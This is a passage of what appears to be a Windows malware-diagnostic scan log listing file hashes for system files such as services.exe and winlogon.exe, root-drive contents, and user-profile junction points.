[2013/12/18 13:42:40 | 000,558,851 | ---- | M] () MD5=A044715A48D8FADB9366D554F20D3331 -- C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\Adobe\Reader 10.0\Reader\Services\Services.cfg

[2011/06/06 12:55:30 | 000,584,045 | R--- | M] () MD5=B82DD53FA8C260DDD7FDC42182DB816E -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744AA0100000010\10.1.0\services.cfg

[2014/05/08 06:21:20 | 000,559,489 | ---- | M] () MD5=E829329E4886E9A3540C62114FC8E145 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Services\Services.cfg

< MD5 for: SERVICES.DLL >

[2004/09/22 19:20:40 | 000,019,968 | ---- | M] () MD5=7273380075B0F4E45D03AE3D92954484 -- C:\Old Computer\Services.dll

< MD5 for: SERVICES.EX_ >

[2002/08/29 14:00:00 | 000,047,953 | ---- | M] () MD5=78718439FA165A148B2F41A9EB41F488 -- C:\Old Computer\SERVICES.EX_

< MD5 for: SERVICES.EXE >

[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\ERDNT\cache64\services.exe

[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe

[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe

[2009/02/06 06:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\Old Computer\services.exe

< MD5 for: SERVICES.EXE.MUI >

[2009/07/13 21:25:40 | 000,017,408 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\SysNative\en-US\services.exe.mui

[2009/07/13 21:25:40 | 000,017,408 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\winsxs\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5f238be3fa63468\services.exe.mui

< MD5 for: SERVICES.H >

[2013/05/16 10:47:15 | 000,001,043 | ---- | M] () MD5=EFA6260E75D8055649F88462E3E9E929 -- C:\love mommy\mysql\include\mysql\services.h

[2014/01/14 03:16:26 | 000,001,043 | ---- | M] () MD5=EFA6260E75D8055649F88462E3E9E929 -- C:\xampp\mysql\include\mysql\services.h

< MD5 for: SERVICES.HTML >

[2012/09/03 23:02:36 | 000,100,399 | ---- | M] () MD5=1194C10D4438244D9BE745657523F4BA -- C:\android-sdk_r18-windows\android-sdk-windows\docs\guide\components\services.html

[2012/09/03 23:04:19 | 000,062,982 | ---- | M] () MD5=72F32557FF33478747630F5392596CBD -- C:\android-sdk_r18-windows\android-sdk-windows\docs\guide\topics\ui\accessibility\services.html

[2012/09/03 23:01:01 | 000,043,575 | ---- | M] () MD5=90BE76D42587E10DB856CCFB014CC547 -- C:\android-sdk_r18-windows\android-sdk-windows\docs\guide\google\play\services.html

< MD5 for: SERVICES.INI >

[2003/10/11 00:33:13 | 000,000,095 | ---- | M] () MD5=5A2ED046E45CB60C4555A17E280D681B -- C:\Old Computer\Services.ini

< MD5 for: SERVICES.JAVA >

[2012/06/03 06:04:36 | 000,006,748 | R--- | M] () MD5=411111AD775B441DDCC5D4EFF612F591 -- C:\android-sdk_r18-windows\android-sdk-windows\sources\android-15\org\apache\harmony\security\fortress\Services.java

[2012/09/03 23:10:57 | 000,006,748 | R--- | M] () MD5=411111AD775B441DDCC5D4EFF612F591 -- C:\android-sdk_r18-windows\android-sdk-windows\sources\android-16\org\apache\harmony\security\fortress\Services.java

< MD5 for: SERVICES.LNK >

[2005/09/07 17:11:19 | 000,001,613 | ---- | M] () MD5=478D58FEF844E458F4509FD8A19620D6 -- C:\System Volume Information\SystemRestore\FRStaging\Old Computer\Services.lnk

[2014/05/26 05:05:47 | 000,001,639 | ---- | M] () MD5=6CF7DC1CB6217C982B0A0D51B210E0FD -- C:\Old Computer\Services.lnk

[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk

[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk

< MD5 for: SERVICES.MOCHIADS.COM.SOL >

[2009/09/27 03:16:02 | 000,000,183 | ---- | M] () MD5=4DBA4EFD538E4B475B7E7055122C52B2 -- C:\Old Computer\services.mochiads.com.sol

< MD5 for: SERVICES.MOF >

[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\SysNative\wbem\services.mof

[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.mof

< MD5 for: SERVICES.MS_ >

[2002/08/29 14:00:00 | 000,003,649 | ---- | M] () MD5=64E9F61D2ED093C361862DE36433B5E1 -- C:\Old Computer\SERVICES.MS_

< MD5 for: SERVICES.MSC >

[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\en-US\services.msc

[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\services.msc

[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\en-US\services.msc

[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\services.msc

[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_003408aa160fce5b\services.msc

[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_2b58d44b5f6beb8a\services.msc

[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a4156d265db25d25\services.msc

[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_cf3a38c7a70e7a54\services.msc

[2002/08/29 07:00:00 | 000,033,464 | ---- | M] () MD5=E8089AA2A6F7FEE89B38C1F2D77BA6C6 -- C:\Old Computer\services.msc

< MD5 for: SERVICES.PTXML >

[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\SysNative\wdi\perftrack\Services.ptxml

[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\Services.ptxml

< MD5 for: SERVICES.RDB >

[2012/08/13 10:51:02 | 000,178,348 | ---- | M] () MD5=039C8CFBD74EE07F38CD9E4C7D95C5C6 -- C:\Program Files (x86)\OpenOffice.org 3\Basis\program\services.rdb

[2012/08/13 10:51:02 | 000,000,453 | ---- | M] () MD5=3D2ADA15FEF5B5FF468243161543D610 -- C:\Program Files (x86)\OpenOffice.org 3\program\services.rdb

[2012/08/10 15:12:16 | 000,008,060 | ---- | M] () MD5=7CA7D7150EC46321162F932ADCF5F35B -- C:\Program Files (x86)\OpenOffice.org 3\URE\misc\services.rdb

< MD5 for: SERVICES.TICO >

[2002/04/02 23:39:26 | 000,002,038 | ---- | M] () MD5=B15FB3A60F5BA41109C6F94067C8DC62 -- C:\Old Computer\services.tico

< MD5 for: WINLOGON.ADML >

[2009/07/13 21:25:22 | 000,008,013 | ---- | M] () MD5=CED0EAD8D152B3D0F114698DE2316C5E -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f0f9032ef6930070\WinLogon.adml

< MD5 for: WINLOGON.ADMX >

[2009/06/10 16:04:41 | 000,005,237 | ---- | M] () MD5=89D8F50E186A16C2CED3CF36DBBC0B2C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm_31bf3856ad364e35_6.1.7600.16385_none_d7024e6992f3424d\WinLogon.admx

< MD5 for: WINLOGON.EX_ >

[2002/08/29 14:00:00 | 000,271,067 | ---- | M] () MD5=C73F996304F177262B0C2B70A7DCB66C -- C:\Old Computer\WINLOGON.EX_

< MD5 for: WINLOGON.EXE >

[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\System Volume Information\SystemRestore\FRStaging\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe

[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\ERDNT\cache64\winlogon.exe

[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe

[2009/07/13 20:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16385_none_cbb7f2bdeea2829c\winlogon.exe

[2014/03/04 06:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe

[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\SysNative\winlogon.exe

[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe

[2009/10/28 02:01:57 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=A93D41A4D4B0D91C072D11DD8AF266DE -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.20560_none_cc522fd507b468f8\winlogon.exe

[2014/05/30 08:12:06 | 001,940,216 | ---- | M] (Bleeping Computer, LLC) MD5=BA48F4C0988795FBEADAE23BE988054D -- C:\Users\Owner\Downloads\WiNlOgOn.exe

[2009/10/28 01:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16447_none_cbe534e7ee8042ad\winlogon.exe

[2008/04/13 19:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\Old Computer\winlogon.exe

< MD5 for: WINLOGON.EXE.MUI >

[2010/11/20 08:00:25 | 000,023,040 | ---- | M] (Microsoft Corporation) MD5=34C7D2E30868EDAFB191341D963ABA5F -- C:\Windows\SysNative\en-US\winlogon.exe.mui

[2010/11/20 08:00:25 | 000,023,040 | ---- | M] (Microsoft Corporation) MD5=34C7D2E30868EDAFB191341D963ABA5F -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7601.17514_en-us_291e96fa1ab5fc7b\winlogon.exe.mui

[2009/07/13 21:29:52 | 000,022,528 | ---- | M] (Microsoft Corporation) MD5=56D03B64B8C483C1D12A8E4577B3B332 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7600.16385_en-us_26ed83321dc778e1\winlogon.exe.mui

< MD5 for: WINLOGON.EXE-8163EECC.PF >

[2014/05/30 10:29:17 | 000,024,606 | ---- | M] () MD5=90A7DD1CF093EBB5930442F8FD2EBF17 -- C:\Windows\Prefetch\WINLOGON.EXE-8163EECC.pf

< MD5 for: WINLOGON.MFL >

[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\SysNative\wbem\en-US\winlogon.mfl

[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84afd4fd38ffd276\winlogon.mfl

< MD5 for: WINLOGON.MOF >

[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\SysNative\wbem\winlogon.mof

[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof_31bf3856ad364e35_6.1.7600.16385_none_dc2dbb778f98e40f\winlogon.mof

< MD5 for: WINLOGON.REG >

[2001/10/23 23:49:08 | 000,000,278 | ---- | M] () MD5=329635F24C2EB6E4B850598AC7CC7AA4 -- C:\Old Computer\winlogon.reg

< %SYSTEMDRIVE%\*.* >

[2009/10/02 18:10:22 | 000,000,622 | ---- | M] () -- C:\0

[2013/05/05 16:47:02 | 000,000,063 | ---- | M] () -- C:\1.html

[2014/04/20 20:05:28 | 000,000,040 | -H-- | M] () -- C:\28A87DD3C73F

[2013/04/27 21:05:37 | 000,000,448 | ---- | M] () -- C:\attach.ini

[2014/04/27 16:07:22 | 000,000,000 | ---- | M] () -- C:\autoexec.bat

[2010/11/20 07:40:07 | 000,383,786 | RHS- | M] () -- C:\bootmgr

[2010/03/29 21:41:54 | 000,008,192 | RHS- | M] () -- C:\BOOTSECT.BAK

[2010/03/30 18:34:14 | 000,000,125 | ---- | M] () -- C:\FINIS_IT.TXT

[2012/06/11 09:04:54 | 000,001,106 | -H-- | M] () -- C:\IPH.PH

[2013/04/25 21:34:13 | 000,000,005 | ---- | M] () -- C:\mail.ini

[2013/04/27 20:54:52 | 000,000,236 | ---- | M] () -- C:\mapui.ini

[2010/05/06 04:09:12 | 000,000,109 | ---- | M] () -- C:\mbam-error.txt

[2006/12/02 01:37:14 | 000,904,704 | ---- | M] (Microsoft Corporation) -- C:\msdia80.dll

[2013/04/26 20:16:30 | 000,000,029 | ---- | M] () -- C:\noticeui.ini

[2012/10/12 02:11:09 | 1363,148,790 | ---- | M] () -- C:\OC

[2014/05/30 10:50:57 | 4284,719,103 | -HS- | M] () -- C:\pagefile.sys

[2014/05/30 08:19:46 | 000,227,546 | ---- | M] () -- C:\TDSSKiller.3.0.0.37_30.05.2014_08.16.18_log.txt

[2012/04/28 16:42:21 | 000,000,050 | ---- | M] () -- C:\user.js

[2012/10/14 13:53:26 | 000,000,488 | ---- | M] () -- C:\WGH_CA_CHEATLOG.txt

[2012/10/13 19:05:43 | 000,001,114 | ---- | M] () -- C:\[CA]Config.ini

[2013/04/29 03:18:42 | 000,002,616 | ---- | M] () -- C:\{4271E4E0-922B-4162-BC7D-D77ABF10DA37}

[2013/07/22 04:37:31 | 000,002,208 | ---- | M] () -- C:\{AACA22D6-8109-43C9-B3A0-FE968E5993B7}

< %systemroot%\Fonts\*.com >

[2009/07/14 00:32:31 | 000,026,040 | ---- | M] () -- C:\Windows\Fonts\GlobalMonospace.CompositeFont

[2009/07/14 00:32:31 | 000,026,489 | ---- | M] () -- C:\Windows\Fonts\GlobalSansSerif.CompositeFont

[2009/07/14 00:32:31 | 000,029,779 | ---- | M] () -- C:\Windows\Fonts\GlobalSerif.CompositeFont

[2009/07/14 00:32:31 | 000,043,318 | ---- | M] () -- C:\Windows\Fonts\GlobalUserInterface.CompositeFont

< %systemroot%\Fonts\*.dll >

< %systemroot%\Fonts\*.ini >

[2009/06/10 15:49:50 | 000,000,065 | ---- | M] () -- C:\Windows\Fonts\desktop.ini

< %systemroot%\Fonts\*.ini2 >

< %systemroot%\Fonts\*.exe >

< %systemroot%\system32\spool\prtprocs\w32x86\*.* >

< %systemroot%\REPAIR\*.bak1 >

< %systemroot%\REPAIR\*.ini >

< %systemroot%\system32\*.jpg >

< %systemroot%\*.jpg >

< %systemroot%\*.png >

< %systemroot%\*.scr >

[2010/10/15 22:18:27 | 001,737,052 | ---- | M] () -- C:\Windows\HalloweenScreamsaver.scr

[2012/03/08 18:37:20 | 000,302,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\WLXPGSS.SCR

[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

< %systemroot%\*._sy >

< %APPDATA%\Adobe\Update\*.* >

< %ALLUSERSPROFILE%\Favorites\*.* >

< %APPDATA%\Microsoft\*.* >

< %PROGRAMFILES%\*.* >

[2010/12/04 12:43:27 | 230,797,822 | ---- | M] () -- C:\Program Files (x86)\Adobe Flash CS4.rar

[2010/11/06 10:13:06 | 242,254,547 | ---- | M] () -- C:\Program Files (x86)\Adobe Illustrator CS4.rar

[2009/07/13 23:54:24 | 000,000,174 | -HS- | M] () -- C:\Program Files (x86)\desktop.ini

[2014/05/25 19:23:07 | 004,296,192 | ---- | M] () -- C:\Program Files (x86)\SO.Booster

[2014/05/25 19:23:08 | 000,174,928 | ---- | M] () -- C:\Program Files (x86)\SOSvc.dll

[2014/05/25 19:23:08 | 004,210,176 | ---- | M] () -- C:\Program Files (x86)\SO_x64.Booster

< %APPDATA%\Update\*.* >

< %systemroot%\*. /mp /s >

< dir "%systemdrive%\*" /S /A:L /C >

Volume in drive C is HP

Volume Serial Number is 960A-5CE9

Directory of C:\

07/14/2009 00:08 <JUNCTION> Documents and Settings [C:\Users]

0 File(s) 0 bytes

Directory of C:\ProgramData

07/14/2009 00:08 <JUNCTION> Application Data [C:\ProgramData]

07/14/2009 00:08 <JUNCTION> Desktop [C:\Users\Public\Desktop]

07/14/2009 00:08 <JUNCTION> Documents [C:\Users\Public\Documents]

07/14/2009 00:08 <JUNCTION> Favorites [C:\Users\Public\Favorites]

07/14/2009 00:08 <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]

07/14/2009 00:08 <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users

07/14/2009 00:08 <SYMLINKD> All Users [C:\ProgramData]

07/14/2009 00:08 <JUNCTION> Default User [C:\Users\Default]

0 File(s) 0 bytes

Directory of C:\Users\All Users

07/14/2009 00:08 <JUNCTION> Application Data [C:\ProgramData]

07/14/2009 00:08 <JUNCTION> Desktop [C:\Users\Public\Desktop]

07/14/2009 00:08 <JUNCTION> Documents [C:\Users\Public\Documents]

07/14/2009 00:08 <JUNCTION> Favorites [C:\Users\Public\Favorites]

07/14/2009 00:08 <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]

07/14/2009 00:08 <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users\Classic .NET AppPool

04/27/2014 18:23 <JUNCTION> Application Data [C:\Users\Classic .NET AppPool\AppData\Roaming]

04/27/2014 18:23 <JUNCTION> Cookies [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Cookies]

04/27/2014 18:23 <JUNCTION> Local Settings [C:\Users\Classic .NET AppPool\AppData\Local]

04/27/2014 18:23 <JUNCTION> My Documents [C:\Users\Classic .NET AppPool\Documents]

04/27/2014 18:23 <JUNCTION> NetHood [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Network Shortcuts]

04/27/2014 18:23 <JUNCTION> PrintHood [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]

04/27/2014 18:23 <JUNCTION> Recent [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Recent]

04/27/2014 18:23 <JUNCTION> SendTo [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\SendTo]

04/27/2014 18:23 <JUNCTION> Start Menu [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Start Menu]

04/27/2014 18:23 <JUNCTION> Templates [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users\Classic .NET AppPool\AppData\Local

04/27/2014 18:23 <JUNCTION> Application Data [C:\Users\Classic .NET AppPool\AppData\Local]

04/27/2014 18:23 <JUNCTION> History [C:\Users\Classic .NET AppPool\AppData\Local\Microsoft\Windows\History]

04/27/2014 18:23 <JUNCTION> Temporary Internet Files [C:\Users\Classic .NET AppPool\AppData\Local\Microsoft\Windows\Temporary Internet Files]

0 File(s) 0 bytes

Directory of C:\Users\Classic .NET AppPool\Documents

04/27/2014 18:23 <JUNCTION> My Music [C:\Users\Classic .NET AppPool\Music]

04/27/2014 18:23 <JUNCTION> My Pictures [C:\Users\Classic .NET AppPool\Pictures]

04/27/2014 18:23 <JUNCTION> My Videos [C:\Users\Classic .NET AppPool\Videos]

0 File(s) 0 bytes

Directory of C:\Users\Default

07/14/2009 00:08 <JUNCTION> Application Data [C:\Users\Default\AppData\Roaming]

07/14/2009 00:08 <JUNCTION> Local Settings [C:\Users\Default\AppData\Local]

07/14/2009 00:08 <JUNCTION> My Documents [C:\Users\Default\Documents]

07/14/2009 00:08 <JUNCTION> NetHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]

07/14/2009 00:08 <JUNCTION> PrintHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]

07/14/2009 00:08 <JUNCTION> Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]

07/14/2009 00:08 <JUNCTION> SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]

07/14/2009 00:08 <JUNCTION> Start Menu [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]

07/14/2009 00:08 <JUNCTION> Templates [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users\Default\AppData\Local

07/14/2009 00:08 <JUNCTION> Application Data [C:\Users\Default\AppData\Local]

07/14/2009 00:08 <JUNCTION> History [C:\Users\Default\AppData\Local\Microsoft\Windows\History]

07/14/2009 00:08 <JUNCTION> Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files]

0 File(s) 0 bytes

Directory of C:\Users\Default\Documents

07/14/2009 00:08 <JUNCTION> My Music [C:\Users\Default\Music]

07/14/2009 00:08 <JUNCTION> My Pictures [C:\Users\Default\Pictures]

07/14/2009 00:08 <JUNCTION> My Videos [C:\Users\Default\Videos]

0 File(s) 0 bytes

Directory of C:\Users\DefaultAppPool

04/27/2014 18:29 <JUNCTION> Application Data [C:\Users\DefaultAppPool\AppData\Roaming]

04/27/2014 18:29 <JUNCTION> Cookies [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Cookies]

04/27/2014 18:29 <JUNCTION> Local Settings [C:\Users\DefaultAppPool\AppData\Local]

04/27/2014 18:29 <JUNCTION> My Documents [C:\Users\DefaultAppPool\Documents]

04/27/2014 18:29 <JUNCTION> NetHood [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Network Shortcuts]

04/27/2014 18:29 <JUNCTION> PrintHood [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]

04/27/2014 18:29 <JUNCTION> Recent [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Recent]

04/27/2014 18:29 <JUNCTION> SendTo [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\SendTo]

04/27/2014 18:29 <JUNCTION> Start Menu [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu]

04/27/2014 18:29 <JUNCTION> Templates [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users\DefaultAppPool\AppData\Local

04/27/2014 18:29 <JUNCTION> Application Data [C:\Users\DefaultAppPool\AppData\Local]

04/27/2014 18:29 <JUNCTION> History [C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\History]

04/27/2014 18:29 <JUNCTION> Temporary Internet Files [C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\Temporary Internet Files]

0 File(s) 0 bytes

Directory of C:\Users\DefaultAppPool\Documents

04/27/2014 18:29 <JUNCTION> My Music [C:\Users\DefaultAppPool\Music]

04/27/2014 18:29 <JUNCTION> My Pictures [C:\Users\DefaultAppPool\Pictures]

04/27/2014 18:29 <JUNCTION> My Videos [C:\Users\DefaultAppPool\Videos]

0 File(s) 0 bytes

Directory of C:\Users\Mcx1-OWNER-PC

08/25/2011 03:33 <JUNCTION> Application Data [C:\Users\Mcx1-OWNER-PC\AppData\Roaming]

08/25/2011 03:33 <JUNCTION> Cookies [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Cookies]

08/25/2011 03:33 <JUNCTION> Local Settings [C:\Users\Mcx1-OWNER-PC\AppData\Local]

08/25/2011 03:33 <JUNCTION> My Documents [C:\Users\Mcx1-OWNER-PC\Documents]

08/25/2011 03:33 <JUNCTION> NetHood [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Network Shortcuts]

08/25/2011 03:33 <JUNCTION> PrintHood [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]

08/25/2011 03:33 <JUNCTION> Recent [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Recent]

08/25/2011 03:33 <JUNCTION> SendTo [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\SendTo]

08/25/2011 03:33 <JUNCTION> Start Menu [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Start Menu]

08/25/2011 03:33 <JUNCTION> Templates [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users\Mcx1-OWNER-PC\AppData\Local

08/25/2011 03:33 <JUNCTION> Application Data [C:\Users\Mcx1-OWNER-PC\AppData\Local]

08/25/2011 03:33 <JUNCTION> History [C:\Users\Mcx1-OWNER-PC\AppData\Local\Microsoft\Windows\History]

08/25/2011 03:33 <JUNCTION> Temporary Internet Files [C:\Users\Mcx1-OWNER-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files]

0 File(s) 0 bytes

Directory of C:\Users\Mcx1-OWNER-PC\Documents

08/25/2011 03:33 <JUNCTION> My Music [C:\Users\Mcx1-OWNER-PC\Music]

08/25/2011 03:33 <JUNCTION> My Pictures [C:\Users\Mcx1-OWNER-PC\Pictures]

08/25/2011 03:33 <JUNCTION> My Videos [C:\Users\Mcx1-OWNER-PC\Videos]

0 File(s) 0 bytes

Directory of C:\Users\Nick

03/30/2010 19:19 <JUNCTION> Application Data [C:\Users\Nick\AppData\Roaming]

03/30/2010 19:19 <JUNCTION> Cookies [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Cookies]

03/30/2010 19:19 <JUNCTION> Local Settings [C:\Users\Nick\AppData\Local]

03/30/2010 19:19 <JUNCTION> My Documents [C:\Users\Nick\Documents]

03/30/2010 19:19 <JUNCTION> NetHood [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Network Shortcuts]

03/30/2010 19:19 <JUNCTION> PrintHood [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]

03/30/2010 19:19 <JUNCTION> Recent [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Recent]

03/30/2010 19:19 <JUNCTION> SendTo [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\SendTo]

03/30/2010 19:19 <JUNCTION> Start Menu [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu]

03/30/2010 19:19 <JUNCTION> Templates [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users\Nick\AppData\Local

03/30/2010 19:19 <JUNCTION> Application Data [C:\Users\Nick\AppData\Local]

03/30/2010 19:19 <JUNCTION> History [C:\Users\Nick\AppData\Local\Microsoft\Windows\History]

03/30/2010 19:19 <JUNCTION> Temporary Internet Files [C:\Users\Nick\AppData\Local\Microsoft\Windows\Temporary Internet Files]

